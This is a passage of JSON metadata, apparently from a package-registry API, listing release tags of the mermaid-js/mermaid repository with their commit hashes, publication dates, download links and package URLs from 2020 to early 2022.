f83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631